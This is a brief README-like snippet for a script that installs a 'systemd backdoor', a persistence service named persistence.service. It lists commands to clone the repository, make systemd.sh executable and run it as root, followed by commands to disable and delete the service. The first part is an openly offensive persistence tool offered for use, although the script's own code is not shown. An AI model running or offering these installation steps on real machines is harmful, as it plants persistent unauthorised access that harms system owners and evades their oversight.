A simple script to automate systemd backdoor
git clone https://github.com/MatheuZSecurity/systemd-backdoor
cd systemd-backdoor && chmod +x systemd.sh
sudo ./systemd.sh
it's important to know how to remove it too
rm /etc/systemd/system/persistence.service
systemctl disable persistence.service
systemctl stop persistence